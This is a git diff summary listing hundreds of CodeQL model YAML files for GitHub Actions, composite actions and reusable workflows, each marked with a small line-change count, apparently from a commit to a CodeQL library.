ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- 
.../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- 
.../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- 
.../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- 
.../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- 
.../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- 
.../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- 
.../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml 
| 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- 
.../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 
2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 
+- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 
2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- 
.../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- 
.../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- 